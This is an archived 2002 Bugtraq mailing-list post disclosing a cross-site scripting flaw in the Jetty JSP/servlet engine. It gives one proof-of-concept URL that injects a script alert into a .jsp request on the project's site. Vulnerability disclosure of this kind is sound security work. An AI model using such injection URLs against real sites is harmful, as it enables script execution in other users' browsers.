Jetty jsp/servlet engine xss / uname disclosure vuln

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: <bugtraq@securityfocus.com>
Subject: Jetty jsp/servlet engine xss / uname disclosure vuln
From: <skinnay@skinnux.com>
Date: Sat, 28 Sep 2002 13:53:17 -0400 (EDT)
Importance: Normal

Jetty is an open source jsp/servlet engine thingamabob
http://jetty.mortbay.org

observe
http://jetty.mortbay.org/%0a%0a<script>alert("jax%20is%20ereet%20:P")</script>.jsp

found by skinnay@skinnux.com
www.skinnux.com
( site and email down alot, not that anyone emails me anyway :)

Prev by Date: SafeTP coughs up internal server IP addresses
Next by Date: ezmlm warning
Previous by thread: SafeTP coughs up internal server IP addresses
Next by thread: iDEFENSE Security Advisory 09.30.2002: Buffer Overflow in WN Server
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux